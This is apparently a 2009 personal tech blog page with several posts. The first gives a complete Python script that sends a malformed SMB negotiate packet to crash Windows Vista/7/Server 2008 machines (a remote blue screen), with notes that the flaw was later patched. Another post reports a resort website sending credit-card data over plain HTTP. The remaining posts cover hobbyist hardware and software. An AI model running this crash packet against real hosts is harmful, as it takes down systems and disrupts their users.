Category: computers

MS09-0??

Published September 8, 2009

As is normal for a Patch Tuesday, Microsoft released a bunch of patches. Unfortunately, none of them fix a vulnerability in SMB2 on Vista, 7, or Server 2008 which allows easy remote BSODs using a single packet. This code below, which works under Python 2.6 on Windows, was very slightly adapted from this post to Full Disclosure.

import socket

host = "127.0.0.1", 445

buff = (

"\x00\x00\x00\x90" # Begin SMB header: Session message

"\xff\x53\x4d\x42" # Server Component: SMB

"\x72\x00\x00\x00" # Negociate Protocol

"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853

"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"

"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"

"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"

"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"

"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"

"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"

"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"

"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"

"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"

"\x30\x30\x32\x00"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(host)

s.send(buff)

s.close()

UPDATE: Microsoft has posted 975497 – Vulnerabilities in SMB Could Allow Remote Code Execution which states:

Microsoft is investigating new public reports of a possible vulnerability in Microsoft Server Message Block (SMB) implementation. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time.

I’m not sure how they define attack, but that BSOD above sure looks like one and making something quick to hit whole subnets in a go would be trivial.

UPDATE 2: This was fixed on 13-Oct-2009 in MS09-050.

Leave a Comment

Garland Resort’s Website is Very Insecure

Published August 26, 2009

Next month I’m going to be attending a wedding at Garland Resort in Michigan’s northern Lower Peninsula. When reserving a hotel room there I noticed that not only was the reservation system using plain old http, the form which accepts a credit card number is insecure. It then again uses HTTP when submitting the form:

<form name='frmRes1' method='post' Action='CCard1.asp?IRM=yes&BtrvID=4249' onSubmit='return NextPage()'>

Here’s an excerpt from a network capture of me submitting a page full of garbage info:

POST http://65.123.67.67/irm/CCard1.asp?IRM=yes&BtrvID=4249 HTTP/1.1\r\n

Line-based text data: application/x-www-form-urlencoded
[truncated] firstname=Test&phone1=987-555-1212&lastname=User&phone2=&address1=12345+No+Street&sob=WI&address2=&ccname=AMEX&city=Default&ccnum=1234567812345678&state=AZ&ccexp=01%2F12&zip=99901&cardid=555&country=&email=test%40example.com&pa

See that last line there? In case you don’t know, the & sign delineates the fields, and it’s a simple valuename=value pair. Therefore, ccnum=1234567812345678 is the garbage credit card number I submitted, cardid is the CVV2, ccexp is the expiration date, etc. This is very definitely not PCI compliant and is a thief’s dream if the victim were submitting this form across a sniffable public network.

Suffice to say, I phoned in my reservation. This is obviously not an ideal solution either, but at least I didn’t use that crap.

Leave a Comment

Python Is Interesting

Published August 20, 2009

Yes, I’m very late to the party, but as I’ve been hearing quite a bit about how useful Python (Wikipedia) is, I’ve spent some spare time over the last week giving it a look. As was suggested by some friends I started with Python 2.6.2, which is the latest version of the previous branch of the language. (There is also a 3.0 branch, but it’s my understanding that it’s not yet widely used and is sufficiently different from the previous version that it’s best to start at 2.6.2.)

After going through most of the very nice official Python tutorial I began playing with Windows-specific things, most notably Tim Golden’s WMI Module, which seems to work quite well. I still have to get more comfortable with the language, but thus far I’ve had no problems reimplementing many of the basic scripts that I’ve written at work to automate random little tasks.

2 Comments

Trashwall Is Dead

Published August 18, 2009

Yesterday while at work Danielle informed me that she was unable to reach the internet from my house. SSHing into Trashwall showed that while it could talk to the public network, for some reason it couldn’t talk internally. I figured that a quick reboot might be worth trying, but after that it never came back. Watching the console yesterday showed it dumping core while booting, and that the system’s time had been reset to the epoch. Hopefully this is just a case of the PRAM battery having failed. It’s a SAFT LS 14250 C, which is thankfully easy to find. Out of the system the battery reads 3.6V, which is normal for it, but it’s possible it’s right on the edge.

I think that after replacing the battery and getting Open Firmware properly set back up I’ll look at replacing it’s el-cheapo 2GB Compact Flash drive with an actual hard disk. The extra space will allow me to run Cacti, which I think would be pretty nifty to use for logging per-device bandwidth use, wireless network stats, and things like that.

Currently my house is running just-fine on an AirPort Extreme which works well, but is a bit limited feature-wise. It’s really nifty that it supports IPv6 and all, but that’s not something that I currently use. If I’m not able to get Trashwall (that is, the Mac with the many-port NICs and such) going again, I’ll have to figure out something else for network connectivity at home. I really like the idea of a ultra-quiet OpenBSD box handling everything, but I’ll have to find (and silence) a PC in order to do the same thing. That might take a lot of effort.

UPDATE: Trashwall was fixed by fitting a new hard disk, replacing the PRAM battery, restoring the OpenFirmware settings, and installing OpenBSD 4.6. Everything is working great again.

Leave a Comment

Google Android (T-Mobile G1) Hanging Sync Problem Resolved

Published July 23, 2009

On Google Android, running on my T-Mobile G1, there is a icon which appears in the notification bar whenever the phone is syncing Gmail, Calendar, Contacts, etc. Typically this icon only appears for a second or two and then goes away. However, a week or so ago I began noticing that my G1’s battery was being completely exhausted at least daily, and quite often I’d pick up the phone to find it very hot with the sync icon stuck on. The warmth seemed to be caused by the radio being constantly in use for extended periods of time as sync tried to occur. While I could deal with the sync not always working right or my having to cancel an in-progress sync, having to charge the phone a few times per day was becoming a big problem.

My short-term workaround was to leave the phone on the charger overnight and allow it to sync then, which seemed to work. However, this was obviously not a solution. Yesterday I finally took time to look into the problem. To start, if I entered Settings → Data Synchronization, the Application sync settings portion would often indicate that sync hadn’t occurred for a day or two. When I manually initiated a sync I noticed that while Gmail and Contacts synced and completed reasonably fast (a few seconds each), the Calendar sync seemed to start and stop repeatedly, never finishing during the time I watched it.

Signing into Google Calendar, which I don’t do very often, showed the error above, stating that …this is not a Calendar user: http://www.google.com/calendar/feeds/adsense-calendar@google.com/public/basic. This calendar is a Google AdSense calendar found on this page within the AdSense help documentation, entitled How do I subscribe to the AdSense Calendar. After removing the entry for this seemingly broken calendar from my Other calendars list I initiated another sync from the phone (Settings → Data Synchronization → MENU → Sync now) and it all syncing completed within 30 seconds.

If one visits the page from which the aforementioned AdSense calendar is linked, the link is still active, but attempting to add the calendar results in this error. Since I’d added this calendar without error a while ago, I suspect that once it became unavailable the phone was unable to promptly complete a calendar sync, having to wait for something to time out before it could complete. Unfortunately, until this timeout the radio was active, which ate battery and caused the phone to warm up.

5 Comments

NetOptics Passive 10/100 Ethernet Port Aggregator Tap Disassembly

Published April 20, 2009

Top/front view of the NetOptics Passive 10/100 Port Aggregator Tap.

Today I received a rather nifty device, an older-model Passive 10/100 Ethernet Port Aggregator Tap (PA-CU) from NetOptics. This device allows one to monitor both halves of a full-duplex 10/100 network connection at once, with only one capture device, which is rather nifty.

It was delivered quite early this morning by FedEx, and upon opening the box I saw that it was practically new, with the power supply shipping bags still sealed. There was no documentation, but this was easy enough to find online, and only consists of jumpers whose settings are silkscreened on the top of the enclosure.

After trying it out today I decided that it would be good to open it up and see what is inside. As this photo shows it is basically their older PCI aggretator tap repackaged into a rather nice metal housing. This board contains a FPGA, a bunch of SRAM, a PIC, and some currently unidentified (but well heatsinked) processors.

If you’d like to see more photos of the inside of the tap, they are all available here: NetOptics Passive 10/100 Ethernet Port Aggregator Tap.

2 Comments

Building AVRDUDE Under OS X

Published March 25, 2009

NOTE: This doesn’t work right. See this update.

Since I don’t do much software development, it took me a bit to understand how to get AVRDUDE to compile with libusb under OS X. These steps here have been confirmed to work for AVRDUDE v5.5 and v5.6:

– Install libusb from MacPorts: sudo port install libusb
– Extract the AVRDUDE source, change to that directory.
– Set CPPFLAGS so the libusb headers can be found: CPPFLAGS="-I/opt/local/include" && export CPPFLAGS
– Set LDFLAGS so the libusb libraries can be found: LDFLAGS="-L/opt/local/lib" && export LDFLAGS
– In the AVRDUDE source directory, run configure as the MacPorts version does: ./configure --mandir=${prefix}/share/man
– Build it: make
– Win!

UPDATE: This doesn’t actually work. It builds, but attempting to access the AVR Dragon returns the following error: avrdude: jtagmkII_getsync(): sign-on command: status -1. This also occurs with the version of AVRDUDE in MacPorts, making me wonder what exactly the AVR MacPack folks had to do to make it build properly for OS X.

1 Comment

Micro Center Customer Service: Win!

Published March 10, 2009

A bottle of Bawls for a coworker and a clearance USB SATA disk enclosure for Danielle. The disk enclosure turned out to be missing screws.

Today at lunch I headed over to Micro Center to return some parts^† and purchase a 2.5″ SATA to USB 2.0 disk enclosure for Danielle’s old hard drive and a bottle of Bawls which I cowrker asked me to pick up for him. I was fortunate (or so I thought) to find the disk enclosure I wanted for $11.96, on clearance because it’d been returned. It was listed as complete and a quick peek inside the package showed that all parts seemed to be there, so I purchased it.

Once I got out to the car (where I snapped that photo) I opened up the box again, but found the enclosure to be missing the screws used for holding the chassis together. Making the enclosure essentially unusable I went back inside, to the same Customer Service person who had returned my previous items, and explained to her that despite saying complete it was actually missing parts. She ended up just doing a like-for-like swap, resulting in my acquiring a brand new enclosure for the clearance price. The difference is only a few dollars, but it was still nice.

This, combined with my original return and previous customer service experiences at Micro Center lead me to believe that, contrary to their terribly inaccurate, misinformed, and misleading commissioned sales people, the customer service folks seem to be pretty okay to deal with.

Leave a Comment

HW-group’s Hercules

Published March 10, 2009

Since Dominic / is doing some serial port troubleshooting today, I dug up a link to one of my favorite serial port troubleshooting tools: HW-group’s Hercules. This is made available ostensibly for use with their RS232 / network / remote serial port devices, but it works great for all manner of serial port work.

I’ve used this utility quite often in the past when testing out serial ports, USB to serial adapters, and various serial devices that I’ve made. I like it because it shows the status of things in virual LEDs and allows you to send arbitrary data, manually toggle DTS/RTS on and off, and just generally generate and receive serial data at will. It also has some nice built-in network features that allow one to virtually use a serial port across a network, and other features which are generally useful for those doing serial network stuff.

Here’s a quote from HW-group’s Hercules page which lists its basic features:

· All basic TCP and UDP utilities in one file, no installation required (just one .EXE file)
· Implemented Serial Port Terminal is working with the Virtual Serial Ports (COM12 for example). You can check and control all serial port lines (CTS, RTS, DTR, DSR, RI, CD)
· Simple TCP client (like the Hyperterminal) with the TEA support, view format, file transfers, macros..
· Easy to use TCP Server with the TEA support, view format, file transfers, macros..
· Hercules contains simple UDP/IP “Terminal” with view formats, echo, file transfers, macros..
· Support the NVT (Network Virtual Terminal) in the Test mode tab, as like as NVT debuging features..
· Using Telnet extended with NVT allows serial port configuration (RFC2217), device identification, confirmation of data sequence, etc.
· It’s FREEWARE you can use and share this software free – check the licence!

Leave a Comment

1234567890

Published February 13, 2009

Yes, I made a point of watching 1234567890 appear. I celebrated by jumping up in the air and clicking my heels. Yes, I’m alone here. Now it’s time to go home.

Leave a Comment